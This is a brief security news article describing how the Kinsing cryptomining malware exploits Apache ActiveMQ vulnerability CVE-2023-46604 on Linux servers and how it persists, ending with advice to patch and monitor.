Kinsing Malware Exploits Apache ActiveMQ Vulnerability to Mine Cryptocurrency

Security researchers from Trend Micro have discovered that the Kinsing malware (also known as h2miner) is actively exploiting the Apache ActiveMQ vulnerability CVE-2023-46604 to download and infect Linux systems with cryptocurrency miners. This vulnerability, which allows for remote code execution (RCE), has been used by Kinsing to infiltrate servers and spread rapidly across networks.

The Apache ActiveMQ vulnerability CVE-2023-46604 is a critical security flaw that affects OpenWire commands, a feature of ActiveMQ that allows for communication between different applications. When exploited, this vulnerability allows an attacker to execute arbitrary code on the vulnerable system.

Executing the malicious script via bash

The Kinsing malware is a particularly dangerous threat that targets Linux-based systems. It can gain entry by exploiting vulnerabilities in web applications or misconfigured container environments. Once inside a system, Kinsing deploys a cryptocurrency-mining script that exploits the host’s resources to mine cryptocurrencies like Bitcoin. This can result in significant damage to the infrastructure and a negative impact on system performance.

To exploit the Apache ActiveMQ vulnerability CVE-2023-46604, the Kinsing malware uses a public exploit that leverages the ProcessBuilder method to execute commands on affected systems. Once the vulnerability is exploited, Kinsing downloads and executes a malicious installer, which in turn executes a malicious script using bash.

The Kinsing malware takes several steps to ensure its persistence on the affected host. It adds a cronjob to download and execute its malicious bootstrap script every minute, and it loads its rootkit in /etc/, which completes a full system compromise.

The CVE-2023-46604 vulnerability is being actively exploited by a wide range of threat actors, including the group behind Kinsing malware. This makes it a significant security risk to organizations worldwide.

Organizations that use Apache ActiveMQ must take immediate action to patch CVE-2023-46604 as soon as possible. In addition, they should maintain up-to-date security patches, regularly audit configurations, and monitor network traffic for unusual activity.